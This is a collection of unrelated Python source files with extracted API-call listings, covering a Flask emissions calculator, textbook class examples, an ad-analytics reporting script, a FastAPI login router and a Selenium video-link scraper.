total_donnee = data[["Consommation d'électricité (kWh)", "Consommation de gaz (kWh)", "Nom du bien"]]
calcul_par_batiment = [[0, 0, ""] for x in range(len(data))]
total_donnee.reset_index(inplace=True, drop=True)
for idx, row in total_donnee.iterrows():
if row[0] > 0:
calcul_par_batiment[idx][0] = row[0] * electricite_emission
if row[1] > 0:
calcul_par_batiment[idx][1] = row[1] * gaz_emission
calcul_par_batiment[idx][2] = row[2]
transpose = list(zip(*calcul_par_batiment))
total = np.array([sum(transpose[0]), sum(transpose[1]), "Total"])
calcul_par_batiment.append(total)
return calcul_par_batiment
if __name__ == "__main__":
app.run()
| [
"flask.render_template",
"pandas.read_csv",
"io.StringIO.StringIO",
"flask.Flask",
"csv.writer"
] | [((207, 222), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (212, 222), False, 'from flask import Flask\n'), ((304, 355), 'pandas.read_csv', 'pd.read_csv', (['"""Export_Deepki_Ready_dae.csv"""'], {'sep': '""","""'}), "('Export_Deepki_Ready_dae.csv', sep=',')\n", (315, 355), True, 'import pandas as pd\n'), ((265, 294), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (280, 294), False, 'from flask import render_template\n'), ((2028, 2050), 'io.StringIO.StringIO', 'io.StringIO.StringIO', ([], {}), '()\n', (2048, 2050), False, 'import io\n'), ((2064, 2078), 'csv.writer', 'csv.writer', (['si'], {}), '(si)\n', (2074, 2078), False, 'import csv\n')] |
# -*- coding: utf-8 -*-
# # Code from page 179
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def size(self):
return len(self._elems)
# print(type(Toy))
# print(type(Toy.__init__), type(Toy.add), type(Toy.size))
# # Code from page 180
# t1 = Toy()
# print(type(t1))
# print(type(t1.add))
# t2 = Toy()
# print(t1 is t2) #test for object identity
# # Code from page 181
# t1 = Toy()
# t2 = Toy()
# t1.add([3, 4])
# t2.add([4])
# print(t1.size() + t2.size())
# # Figure 10-1 from page 182
class Int_set(object):
"""An Int_set is a set of integers"""
#Information about the implementation (not the abstraction):
#Value of a set is represented by a list of ints, self._vals.
#Each int in a set occurs in self._vals exactly once.
def __init__(self):
"""Create an empty set of integers"""
self._vals = []
def insert(self, e):
"""Assumes e is an integer and inserts e into self"""
if e not in self._vals:
self._vals.append(e)
def member(self, e):
"""Assumes e is an integer
Returns True if e is in self, and False otherwise"""
return e in self._vals
def remove(self, e):
"""Assumes e is an integer and removes e from self
Raises ValueError if e is not in self"""
try:
self._vals.remove(e)
except:
raise ValueError(str(e) + ' not found')
def get_members(self):
"""Returns a list containing the elements of self._
Nothing can be assumed about the order of the elements"""
return self._vals[:]
def union(self, other):
"""other is an Int_set
mutates self so that it contains exactly the elemnts in self
plus the elements in other."""
def __str__(self):
"""Returns a string representation of self"""
if self._vals == []:
return '{}'
self._vals.sort()
result = ''
for e in self._vals:
result = result + str(e) + ','
return f'{{{result[:-1]}}}'
# # Code from page 183
# s = Int_set()
# s.insert(3)
# print(s.member(3))
# # Code from page 184
# s = Int_set()
# s.insert(3)
# s.insert(4)
# print(str(s))
# print('The value of s is', s)
# # Header for finger exercise on page 184
def union(self, other):
"""other is an Int_set
mutates self so that it contains exactly the elemnts in self
plus the elements in other."""
# # Figure 10-2 on page 185
class Toy(object):
def __init__(self):
self._elems = []
def add(self, new_elems):
"""new_elems is a list"""
self._elems += new_elems
def __len__(self):
return len(self._elems)
def __add__(self, other):
new_toy = Toy()
new_toy._elems = self._elems + other._elems
return new_toy
def __eq__(self, other):
return self._elems == other._elems
def __str__(self):
return str(self._elems)
def __hash__(self):
return id(self)
# t1 = Toy()
# t2 = Toy()
# t1.add([1, 2])
# t2.add([3, 4])
# t3 = t1 + t2
# print('The value of t3 is', t3)
# print('The length of t3 is', len(t3))
# d = {t1: 'A', t2: 'B'}
# print('The value', d[t1], 'is associated with the key t1 in d.')
# # Import used for class Person
import datetime
# # Figure 10-3 from page 189
class Person(object):
def __init__(self, name):
"""Assumes name a string. Create a person"""
self._name = name
try:
last_blank = name.rindex(' ')
self._last_name = name[last_blank+1:]
except:
self._last_name = name
self.birthday = None
def get_name(self):
"""Returns self's full name"""
return self._name
def get_last_name(self):
"""Returns self's last name"""
return self._last_name
def set_birthday(self, birthdate):
"""Assumes birthdate is of type datetime.date
Sets self's birthday to birthdate"""
self._birthday = birthdate
def get_age(self):
"""Returns self's current age in days"""
if self._birthday == None:
raise ValueError
return (datetime.date.today() - self._birthday).days
def __lt__(self, other):
"""Assume other a Person
Returns True if self precedes other in alphabetical
order, and False otherwise. Comparison is based on last
names, but if these are the same full names are
compared."""
if self._last_name == other._last_name:
return self._name < other._name
return self._last_name < other._last_name
def __str__(self):
"""Returns self's name"""
return self._name
# # Code from page 188
# me = Person('<NAME>')
# him = Person('<NAME>')
# her = Person('Madonna')
# print(him.get_last_name())
# him.set_birthday(datetime.date(1961, 8, 4))
# her.set_birthday(datetime.date(1958, 8, 16))
# print(him.get_name(), 'is', him.get_age(), 'days old')
# # Code from page 190
# p_list = [me, him, her]
# for p in p_list:
# print(p)
# p_list.sort()
# for p in p_list:
# print(p)
# # Figure 10-4 from page 192
class MIT_person(Person):
_next_id_num = 0 #identification number
def __init__(self, name):
super().__init__(name)
self._id_num = MIT_person._next_id_num
MIT_person._next_id_num += 1
def get_id_num(self):
return self._id_num
def __lt__(self, other):
return self._id_num < other._id_num
# # Code from page 192
# p1 = MIT_person('<NAME>')
# print(str(p1) + '\'s id number is ' + str(p1.get_id_num()))
# # Code from page 193
p1 = MIT_person('<NAME>')
p2 = MIT_person('<NAME>')
p3 = MIT_person('<NAME>')
p4 = Person('<NAME>')
# print('p1 < p2 =', p1 < p2)
# print('p3 < p2 =', p3 < p2)
# print('p4 < p1 =', p4 < p1)
# print('p1 < p4 =', p1 < p4)
# Finger exercise from page 194
class Politician(Person):
""" A politician is a person that can belong to a political party"""
def __init__(self, name, party = None):
"""name and party are strings"""
def get_party(self):
"""returns the party to which self belongs"""
def might_agree(self, other):
"""returns True if self and other belong to the same part
or at least one of then does not belong to a party"""
# # Figure 10-5 from page 194
class Student(MIT_person):
pass
class UG(Student):
def __init__(self, name, class_year):
super().__init__(name)
self._year = class_year
def get_class(self):
return self._year
class Grad(Student):
pass
# # Code from page 195
# p5 = Grad('<NAME>')
# p6 = UG('<NAME>', 1984)
# print(p5, 'is a graduate student is', type(p5) == Grad)
# print(p5, 'is an undergraduate student is', type(p5) == UG)
# # Code from page 195 -- Should be added to class MIT_Person
def is_student(self):
return isinstance(self, Student)
# print(p5, 'is a student is', p5.is_student())
# print(p6, 'is a student is', p6.is_student())
# print(p3, 'is a student is', p3.is_student())
# # Code from page 196
class Transfer_student(Student):
def __init__(self, name, from_school):
MIT_person.__init__(self, name)
self._from_school = from_school
def get_old_school(self):
return self._from_school
# # Figure 10-6 from page 198
class Grades(object):
def __init__(self):
"""Create empty grade book"""
self._students = []
self._grades = {}
self._is_sorted = True
def add_student(self, student):
"""Assumes: student is of type Student
Add student to the grade book"""
if student in self._students:
raise ValueError('Duplicate student')
self._students.append(student)
self._grades[student.get_id_num()] = []
self._is_sorted = False
def add_grade(self, student, grade):
"""Assumes: grade is a float
Add grade to the list of grades for student"""
try:
self._grades[student.get_id_num()].append(grade)
except:
raise ValueError('Student not in mapping')
def get_grades(self, student):
"""Return a list of grades for student"""
try:
return self._grades[student.get_id_num()][:]
except:
raise ValueError('Student not in mapping')
def get_students(self):
"""Return a sorted list of the students in the grade book"""
if not self._is_sorted:
self._students.sort()
self._is_sorted = True
return self._students[:]
# def get_students(self): #new version from later in chapter
# """Return the students in the grade book one at a time
# in alphabetical order"""
# if not self._is_sorted:
# self._students.sort()
# self._is_sorted = True
# for s in self._students:
# yield s
# # Code from page 197
# course = Grades()
# course.add_student(Grad('Bernie'))
# all_students = course.get_students()
# all_students.append(Grad('Liz'))
# # Figure 10-7 from page 199
def grade_report(course):
"""Assumes course is of type Grades"""
report = ''
for s in course.get_students():
tot = 0.0
num_grades = 0
for g in course.get_grades(s):
tot += g
num_grades += 1
try:
average = tot/num_grades
report = f"{report}\n{s}'s mean grade is {average}"
except ZeroDivisionError:
report = f"{report}\n{s} has no grades"
return report
# ug1 = UG('<NAME>', 2021)
# ug2 = UG('<NAME>', 2041)
# ug3 = UG('<NAME>', 2003)
# g1 = Grad('<NAME>')
# g2 = Grad('<NAME>')
# six_hundred = Grades()
# six_hundred.add_student(ug1)
# six_hundred.add_student(ug2)
# six_hundred.add_student(g1)
# six_hundred.add_student(g2)
# for s in six_hundred.get_students():
# six_hundred.add_grade(s, 75)
# six_hundred.add_grade(g1, 25)
# six_hundred.add_grade(g2, 100)
# six_hundred.add_student(ug3)
# print(grade_report(six_hundred))
# # Figure 10-8 from page 201
class info_hiding(object):
def __init__(self):
self.visible = 'Look at me'
self.__also_visible__ = 'Look at me too'
self.__invisible = 'Don\'t look at me directly'
def print_visible(self):
print(self.visible)
def print_invisible(self):
print(self.__invisible)
def __print_invisible(self):
print(self.__invisible)
def __print_invisible__(self):
print(self.__invisible)
# # Code from page 201
# test = info_hiding()
# print(test.visible)
# print(test.__also_visible__)
# print(test.__invisible)
# test = info_hiding()
# test.print_invisible()
# test.__print_invisible__()
# test.__print_invisible()
# # Code from page 202
class Sub_class(info_hiding):
def new_print_invisible(self):
print(self.__invisible)
# test_sub = Sub_class()
# test_sub.new_print_invisible()
# # Figure 10-9 from page 204 is embedded as a comment in code for Figue 10-7
# # Code from page 205
# book = Grades()
# book.add_student(Grad('Julie'))
# book.add_student(Grad('Lisa'))
# for s in book.get_students():
# print(s)
# # Finger exercise from page 205
def get_students_above(self, grade):
"""Return the students a mean grade > g one at a time"""
# # Figure 10-10 from page 208
def find_payment(loan, r, m):
"""Assumes: loan and r are floats, m an int
Returns the monthly payment for a mortgage of size
loan at a monthly rate of r for m months"""
return loan*((r*(1+r)**m)/((1+r)**m - 1))
class Mortgage(object):
"""Abstract class for building different kinds of mortgages"""
def __init__(self, loan, ann_rate, months):
"""Assumes: loan and ann_rate are floats, months an int
Creates a new mortgage of size loan, duration months, and
annual rate ann_rate"""
self._loan = loan
self._rate = ann_rate/12
self._months = months
self._paid = [0.0]
self._outstanding = [loan]
self._payment = find_payment(loan, self._rate, months)
self._legend = None #description of mortgage
def make_payment(self):
"""Make a payment"""
self._paid.append(self._payment)
reduction = self._payment - self._outstanding[-1]*self._rate
self._outstanding.append(self._outstanding[-1] - reduction)
def get_total_paid(self):
"""Return the total amount paid so far"""
return sum(self._paid)
def __str__(self):
return self._legend
# Figure 10-11 from page 211
class Fixed(Mortgage):
def __init__(self, loan, r, months):
Mortgage.__init__(self, loan, r, months)
self._legend = f'Fixed, {r*100:.1f}%'
class Fixed_with_pts(Mortgage):
def __init__(self, loan, r, months, pts):
Mortgage.__init__(self, loan, r, months)
self._pts = pts
self._paid = [loan*(pts/100)]
self._legend = f'Fixed, {r*100:.1f}%, {pts} points'
class Two_rate(Mortgage):
def __init__(self, loan, r, months, teaser_rate, teaser_months):
Mortgage.__init__(self, loan, teaser_rate, months)
self._teaser_months = teaser_months
self._teaser_rate = teaser_rate
self._nextRate = r/12
self._legend = (f'{100*teaser_rate:.1f}% for ' +
f'{self._teaser_months} months, then {100*r:.1f}%')
def make_payment(self):
if len(self._paid) == self._teaser_months + 1:
self._rate = self._nextRate
self._payment = find_payment(self._outstanding[-1],
self._rate,
self._months - self._teaser_months)
Mortgage.make_payment(self)
def compare_mortgages(amt, years, fixed_rate, pts, pts_rate,
var_rate1, var_rate2, var_months):
tot_months = years*12
fixed1 = Fixed(amt, fixed_rate, tot_months)
fixed2 = Fixed_with_pts(amt, pts_rate, tot_months, pts)
two_rate = Two_rate(amt, var_rate2, tot_months, var_rate1,
var_months)
morts = [fixed1, fixed2, two_rate]
for m in range(tot_months):
for mort in morts:
mort.make_payment()
for m in morts:
print(m)
print(f' Total payments = ${m.get_total_paid():,.0f}')
# # Code from page 210
# compare_mortgages(amt=200000, years=30, fixed_rate=0.035,
# pts = 2, pts_rate=0.03, var_rate1=0.03,
# var_rate2=0.05, var_months=60)
| [
"datetime.date.today"
] | [((4324, 4345), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (4343, 4345), False, 'import datetime\n')] |
"""
组合模式
"""
from DataStructure.Link import FavoritesList
if __name__ == '__main__':
_favorites_list = FavoritesList()
| [
"DataStructure.Link.FavoritesList"
] | [((109, 124), 'DataStructure.Link.FavoritesList', 'FavoritesList', ([], {}), '()\n', (122, 124), False, 'from DataStructure.Link import FavoritesList\n')] |
import adwords_pull
import analytics_pull
import process_xml
import match_maker
import csv_parser
import pandas
import pandasql
import datetime
import google_auth
from google.cloud import bigquery
from datetime import date
from dateutil.relativedelta import relativedelta, SU,MO,TU,WE,TH,FR,SA
import pprint
from currency_converter import CurrencyConverter
def main():
DECLINE_PERCENT = 0.5 #50% - Change this to fit your needs - the higher it is, the less results you will get.
c = CurrencyConverter()
#Get the individual days to pull (for Analytics to avoid data sampling) and to get the start and end date for adwords
FourWeekList = FourWeekCreate()
FourWeekList.sort()
START_WEEK = int(FourWeekList[0].strftime("%W")) + 1
END_WEEK = int(FourWeekList[-1].strftime("%W")) + 1
START_DATE = str(FourWeekList[0])
END_DATE = str(FourWeekList[-1])
#ADWORDS PULL API
adwordsCSV = adwords_pull.ProductDecline(START_DATE,END_DATE)
adwordsDF = csv_parser.parseToCSV(adwordsCSV,"ADW")
print("Adwords API Pull Complete")
#ANALYTIS PULL API
analyticsCSV = ""
for day in FourWeekList:
analyticsCSV += analytics_pull.main(str(day))
print("Pulled date: " + str(day))
print("Analytics API Pull Complete")
dfAnalytics = csv_parser.parseToCSV(analyticsCSV,"ANL")
dfAnalytics['productName'] = dfAnalytics['productName'].str.lower()
dfAnalytics['date'] = dfAnalytics.apply(lambda row: match_maker.CheckDateFormatAnalytics(row), axis=1)
dfAnalytics = dfAnalytics[dfAnalytics.date != -1]
#ADD WEEK AND YEAR NUMBERS
adwordsDF['yearNum'] = adwordsDF.apply(lambda row: match_maker.ApplyYear(row), axis=1)
adwordsDF['weekNum'] = adwordsDF.apply(lambda row: match_maker.ApplyWeek(row), axis=1)
dfAnalytics['yearNum'] = dfAnalytics.apply(lambda row: match_maker.ApplyYear(row,"ANL"), axis=1)
dfAnalytics['weekNum'] = dfAnalytics.apply(lambda row: match_maker.ApplyWeek(row,"ANL"), axis=1)
#REMOVE THE SPACE AFTER THE GID
GIDnew = []
for index, row in adwordsDF.iterrows():
newGID = row['GID'].partition(" ")[0]
GIDnew.append(newGID)
adwordsDF=adwordsDF.drop(columns="GID")
adwordsDF.loc[:,"GID"] = GIDnew
#GET ALL THE GIDs THAT CLICKS SUM UP TO 400+ OVER THE 4 WEEK PERIOD
sqlAdwordsPD = '''
SELECT
GID,
SUM(Clicks) as Clicks
FROM adwordsDF
GROUP BY GID
'''
incGIDdf = pandasql.sqldf(sqlAdwordsPD, locals())
sqlAdwordsPD = '''
SELECT
GID
FROM incGIDdf
WHERE Clicks > 400
'''
incGIDdf = pandasql.sqldf(sqlAdwordsPD, locals())
#NOW WE HAVE A LIST OF GIDs THAT HAVE MORE THAN 400 CLICKS IN THE 4 WEEK PERIOD
#GROUP THE ORIGINAL ADWORDS DF!
sqlAdwordsPD = '''
SELECT
yearNum,
weekNum,
GID,
SUM(Impressions) as Impressions,
SUM(Clicks) as Clicks,
Sum(Cost) as Cost,
Account,
SUM(ConversionValue) as ConversionValue
FROM adwordsDF
GROUP BY GID,Account,weekNum,yearNum
'''
# WRITE TO DF
adwordsDF = pandasql.sqldf(sqlAdwordsPD, locals())
#Filter the dataframe to only contain the GIDs that were found using the SQL
cols = adwordsDF.columns[adwordsDF.columns.isin(['GID'])]
adwordsDFnew = pandas.DataFrame()
for index,row in incGIDdf.iterrows():
adwordsDFnew = adwordsDFnew.append(adwordsDF[(adwordsDF[cols] == row['GID']).all(1)])
adwordsDF.iloc[0:0]
# adwordsDFnew now holds the weekly numbers of the products that add to over 400 clicks in the period when combined
#Slim down the analytics data and group it together whhile summing up the values
#This is repeated code, but im putting it here again incase there are different metrics people want for this slide specifically
sqlGroupAnalytics = '''
SELECT dfAnalytics.productName as productName,
dfAnalytics.productSku as productSku,
dfAnalytics.country as country,
dfAnalytics.weekNum as weekNum,
dfAnalytics.yearNum as yearNum,
SUM(dfAnalytics.itemRevenue) as itemRevenue,
AVG(dfAnalytics.buyToDetailRate) as buyToDetailRate
FROM dfAnalytics
WHERE dfAnalytics.country = "United States"
GROUP BY dfAnalytics.country, dfAnalytics.productSku, dfAnalytics.productName, dfAnalytics.weekNum , dfAnalytics.yearNum
'''
dfAnalytics = pandasql.sqldf(sqlGroupAnalytics, locals())
dfAnalytics.to_csv('analytics_after_proc.csv')
#Match analytics onto adwords DFs
#This is repeated code, but im putting it here again incase there are different metrics people want for this slide specifically
sql = '''
SELECT adwordsDFnew.GID as ID,
adwordsDFnew.Impressions as Impressions,
adwordsDFnew.Cost as Cost,
adwordsDFnew.Clicks as Clicks,
adwordsDFnew.ConversionValue as ConversionValue,
dfAnalytics.itemRevenue as itemRev,
dfAnalytics.buyToDetailRate as buyToDetailRate,
MIN(dfAnalytics.productName) as productName,
dfAnalytics.country as country,
dfAnalytics.weekNum as weekNum,
dfAnalytics.yearNum as yearNum
FROM adwordsDFnew
INNER JOIN dfAnalytics
ON (LOWER(adwordsDFnew.GID) = LOWER(dfAnalytics.productSku)
and adwordsDFnew.weekNum = dfAnalytics.weekNum
and adwordsDFnew.yearNum = dfAnalytics.yearNum
)
GROUP BY ID,Impressions,Cost,Clicks,ConversionValue,itemRev,buyToDetailRate,country,dfAnalytics.weekNum,dfAnalytics.yearNum
ORDER BY adwordsDFnew.GID, dfAnalytics.weekNum
'''
dfAnalytics.iloc[0:0]
dfFinal = pandasql.sqldf(sql, locals())
dfFinal = dfFinal[dfFinal.productName != '(not set)'] #This specific client has anomolies in the data, its just repeating so we remove it
####### CONVERT CURRENCY START ########
#COMMENT OUT THE BELOW IF YOU DONT NEED TO CONVERT CURRENCY - Adjust variable names accordingly
newCost = []
newROAS = []
for dfFinalIndex, dfFinalRow in dfFinal.iterrows():
newVal = c.convert(dfFinalRow['Cost'] / 1000000, 'USD', 'YOUR_CURRENCY') #div by 1Million as google provides the cost in this format
newCost.append(newVal)
if float(newVal) <= 0:
newROAS.append(0)
else:
newROAS.append(float(dfFinalRow['itemRev']) / float(newVal))
dfFinal.loc[:,"newCost"] = newCost
dfFinal.loc[:,"newROAS"] = newROAS
####### CONVERT CURRENCY END ########
#NOW FILTER OUT ONES WITHOUTH 4 RECORDS - Keep things simple
for index,row in incGIDdf.iterrows():
sqlGetGID = '''
SELECT *
FROM dfFinal
WHERE ID = "''' + str(row['GID']) + '''"
ORDER BY weekNum ASC
'''
tempDF = pandasql.sqldf(sqlGetGID, locals()) #this should contain the 4 weeks (or less)
if(len(tempDF.index) != 4): #doesnt have all data : remove
dfFinal = dfFinal[dfFinal.ID != str(row['GID'])]
else:
START_WK_ROAS = tempDF['newROAS'].iloc[0]
END_WK_ROAS = tempDF['newROAS'].iloc[3]
if float(END_WK_ROAS) >= float(float(START_WK_ROAS) * DECLINE_PERCENT): #IS NOT IN DECLINE
#NOT IN DECLINE SO REMOVE FROM LIST
dfFinal = dfFinal[dfFinal.ID != str(row['GID'])] # remove the rows wwhere the ID is the current one
#Whatever is left over now are the products in decline
dfFinal = dfFinal.sort_values(by=['ID','weekNum'])
dfFinal["WeekRange"] = str(START_WEEK) + ' - ' + str(END_WEEK) + " - " + str(START_DATE) + " - " + str(END_DATE)
#dfFinal.to_csv('dfFinal.csv')
dfFinal.to_gbq('DATASET_NAME.TABLE_NAME',
project_id='YOUR_PROJECT_ID',
chunksize=None,
if_exists='append',
table_schema=None,
location='LOCATION',
progress_bar=True,
credentials=google_auth.getCreds())
print("Success!")
def FourWeekCreate():
today = date.today()
weekArr = []
for i in range(4):
lastMon = -2 - i #must be -1 more than other days as it runs every monday. so it needs to look at LAST monday
otherDays = -1 - i
weekArr.append(today + relativedelta(weekday=MO(lastMon))) #last MON
weekArr.append(today + relativedelta(weekday=TU(otherDays))) #last TUE
weekArr.append(today + relativedelta(weekday=WE(otherDays))) #last WED
weekArr.append(today + relativedelta(weekday=TH(otherDays))) #last THU
weekArr.append(today + relativedelta(weekday=FR(otherDays))) #last FRI
weekArr.append(today + relativedelta(weekday=SA(otherDays))) #last SAT
weekArr.append(today + relativedelta(weekday=SU(otherDays))) #last SUN
return weekArr
if __name__ == "__main__":
main() | [
"google_auth.getCreds",
"csv_parser.parseToCSV",
"adwords_pull.ProductDecline",
"match_maker.CheckDateFormatAnalytics",
"dateutil.relativedelta.WE",
"dateutil.relativedelta.TH",
"dateutil.relativedelta.MO",
"dateutil.relativedelta.SU",
"match_maker.ApplyYear",
"dateutil.relativedelta.FR",
"dateu... | [((496, 515), 'currency_converter.CurrencyConverter', 'CurrencyConverter', ([], {}), '()\n', (513, 515), False, 'from currency_converter import CurrencyConverter\n'), ((927, 976), 'adwords_pull.ProductDecline', 'adwords_pull.ProductDecline', (['START_DATE', 'END_DATE'], {}), '(START_DATE, END_DATE)\n', (954, 976), False, 'import adwords_pull\n'), ((992, 1032), 'csv_parser.parseToCSV', 'csv_parser.parseToCSV', (['adwordsCSV', '"""ADW"""'], {}), "(adwordsCSV, 'ADW')\n", (1013, 1032), False, 'import csv_parser\n'), ((1307, 1349), 'csv_parser.parseToCSV', 'csv_parser.parseToCSV', (['analyticsCSV', '"""ANL"""'], {}), "(analyticsCSV, 'ANL')\n", (1328, 1349), False, 'import csv_parser\n'), ((3288, 3306), 'pandas.DataFrame', 'pandas.DataFrame', ([], {}), '()\n', (3304, 3306), False, 'import pandas\n'), ((8022, 8034), 'datetime.date.today', 'date.today', ([], {}), '()\n', (8032, 8034), False, 'from datetime import date\n'), ((1477, 1518), 'match_maker.CheckDateFormatAnalytics', 'match_maker.CheckDateFormatAnalytics', (['row'], {}), '(row)\n', (1513, 1518), False, 'import match_maker\n'), ((1669, 1695), 'match_maker.ApplyYear', 'match_maker.ApplyYear', (['row'], {}), '(row)\n', (1690, 1695), False, 'import match_maker\n'), ((1760, 1786), 'match_maker.ApplyWeek', 'match_maker.ApplyWeek', (['row'], {}), '(row)\n', (1781, 1786), False, 'import match_maker\n'), ((1855, 1888), 'match_maker.ApplyYear', 'match_maker.ApplyYear', (['row', '"""ANL"""'], {}), "(row, 'ANL')\n", (1876, 1888), False, 'import match_maker\n'), ((1956, 1989), 'match_maker.ApplyWeek', 'match_maker.ApplyWeek', (['row', '"""ANL"""'], {}), "(row, 'ANL')\n", (1977, 1989), False, 'import match_maker\n'), ((7940, 7962), 'google_auth.getCreds', 'google_auth.getCreds', ([], {}), '()\n', (7960, 7962), False, 'import google_auth\n'), ((8273, 8284), 'dateutil.relativedelta.MO', 'MO', (['lastMon'], {}), '(lastMon)\n', (8275, 8284), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8350, 8363), 'dateutil.relativedelta.TU', 'TU', (['otherDays'], {}), '(otherDays)\n', (8352, 8363), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8429, 8442), 'dateutil.relativedelta.WE', 'WE', (['otherDays'], {}), '(otherDays)\n', (8431, 8442), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8508, 8521), 'dateutil.relativedelta.TH', 'TH', (['otherDays'], {}), '(otherDays)\n', (8510, 8521), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8587, 8600), 'dateutil.relativedelta.FR', 'FR', (['otherDays'], {}), '(otherDays)\n', (8589, 8600), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8666, 8679), 'dateutil.relativedelta.SA', 'SA', (['otherDays'], {}), '(otherDays)\n', (8668, 8679), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n'), ((8745, 8758), 'dateutil.relativedelta.SU', 'SU', (['otherDays'], {}), '(otherDays)\n', (8747, 8758), False, 'from dateutil.relativedelta import relativedelta, SU, MO, TU, WE, TH, FR, SA\n')] |
from fastapi import APIRouter, Depends, HTTPException, Response, status
from fastapi.security import OAuth2PasswordRequestForm
from pydantic import BaseModel
from fastapi_users import models
from fastapi_users.authentication import Authenticator, BaseAuthentication
from fastapi_users.manager import BaseUserManager, UserManagerDependency
from fastapi_users.router.common import ErrorCode, ErrorModel
class LoginBadCredentials(BaseModel):
detail: ErrorCode.LOGIN_BAD_CREDENTIALS
class LoginUserNotVerified(BaseModel):
detail: ErrorCode.LOGIN_USER_NOT_VERIFIED
def get_auth_router(
backend: BaseAuthentication,
get_user_manager: UserManagerDependency[models.UC, models.UD],
authenticator: Authenticator,
requires_verification: bool = False,
) -> APIRouter:
"""Generate a router with login/logout routes for an authentication backend."""
router = APIRouter()
get_current_user = authenticator.current_user(
active=True, verified=requires_verification
)
login_responses = {
status.HTTP_400_BAD_REQUEST: {
"model": ErrorModel,
"content": {
"application/json": {
"examples": {
ErrorCode.LOGIN_BAD_CREDENTIALS: {
"summary": "Bad credentials or the user is inactive.",
"value": {"detail": ErrorCode.LOGIN_BAD_CREDENTIALS},
},
ErrorCode.LOGIN_USER_NOT_VERIFIED: {
"summary": "The user is not verified.",
"value": {"detail": ErrorCode.LOGIN_USER_NOT_VERIFIED},
},
}
}
},
},
**backend.get_openapi_login_responses_success(),
}
@router.post(
"/login",
name="auth:login",
responses=login_responses,
)
async def login(
response: Response,
credentials: OAuth2PasswordRequestForm = Depends(),
user_manager: BaseUserManager[models.UC, models.UD] = Depends(get_user_manager),
):
user = await user_manager.authenticate(credentials)
if user is None or not user.is_active:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=ErrorCode.LOGIN_BAD_CREDENTIALS,
)
if requires_verification and not user.is_verified:
raise HTTPException(
status_code=status.HTTP_400_BAD_REQUEST,
detail=ErrorCode.LOGIN_USER_NOT_VERIFIED,
)
return await backend.get_login_response(user, response, user_manager)
if backend.logout:
logout_responses = {
**{
status.HTTP_401_UNAUTHORIZED: {
"description": "Missing token or inactive user."
}
},
**backend.get_openapi_logout_responses_success(),
}
@router.post("/logout", name="auth:logout", responses=logout_responses)
async def logout(
response: Response,
user=Depends(get_current_user),
user_manager: BaseUserManager[models.UC, models.UD] = Depends(
get_user_manager
),
):
return await backend.get_logout_response(user, response, user_manager)
return router
| [
"fastapi.HTTPException",
"fastapi.APIRouter",
"fastapi.Depends"
] | [((884, 895), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (893, 895), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2022, 2031), 'fastapi.Depends', 'Depends', ([], {}), '()\n', (2029, 2031), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2095, 2120), 'fastapi.Depends', 'Depends', (['get_user_manager'], {}), '(get_user_manager)\n', (2102, 2120), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2255, 2354), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_400_BAD_REQUEST', 'detail': 'ErrorCode.LOGIN_BAD_CREDENTIALS'}), '(status_code=status.HTTP_400_BAD_REQUEST, detail=ErrorCode.\n LOGIN_BAD_CREDENTIALS)\n', (2268, 2354), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((2474, 2575), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': 'status.HTTP_400_BAD_REQUEST', 'detail': 'ErrorCode.LOGIN_USER_NOT_VERIFIED'}), '(status_code=status.HTTP_400_BAD_REQUEST, detail=ErrorCode.\n LOGIN_USER_NOT_VERIFIED)\n', (2487, 2575), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((3143, 3168), 'fastapi.Depends', 'Depends', (['get_current_user'], {}), '(get_current_user)\n', (3150, 3168), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n'), ((3236, 3261), 'fastapi.Depends', 'Depends', (['get_user_manager'], {}), '(get_user_manager)\n', (3243, 3261), False, 'from fastapi import APIRouter, Depends, HTTPException, Response, status\n')] |
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import collections
import os
def Clear_Empty_Lines(text):
# Read lines as a list
fh = open(text, "r")
lines = fh.readlines()
fh.close()
# Clear empty lines
lines = filter(lambda x: not x.isspace(), lines)
# Rewrite the file
fh = open(text, "w")
fh.write("".join(lines))
fh.close()
def Get_Video_URL(url):
print("Starting...")
print("Opening Window...")
driver = webdriver.Chrome()
driver.get(url)
print("Scrolling down...")
ht=driver.execute_script("return document.documentElement.scrollHeight;")
while True:
prev_ht=driver.execute_script("return document.documentElement.scrollHeight;")
driver.execute_script("window.scrollTo(0, document.documentElement.scrollHeight);")
time.sleep(2)
ht=driver.execute_script("return document.documentElement.scrollHeight;")
if prev_ht==ht:
break
print("Finding the urls...")
title = driver.title
# You might have to change id="mp4" to whatever the site uses
link = driver.find_elements_by_xpath('//*[@id="mp4"]')[0].get_attribute("src")
driver.quit()
return str(title), str(link)
url_dict = {'VideoURLs_1':'VideoLinks_1.txt'}
key = 'VideoURLs_1'
text = url_dict[key]
Clear_Empty_Lines(text)
sz = []
text_file_re = open(text, "r", encoding='utf-8')
for x in text_file_re:
sz.append(x.strip('\n'))
text_file_re.close()
video_file_name = key+".txt"
if os.path.isfile(video_file_name):
already = []
video_text_file_r = open(video_file_name, "r", encoding='utf-8')
for x in video_text_file_r:
already.append(x.strip('\n').split(" : ")[1])
video_text_file_r.close()
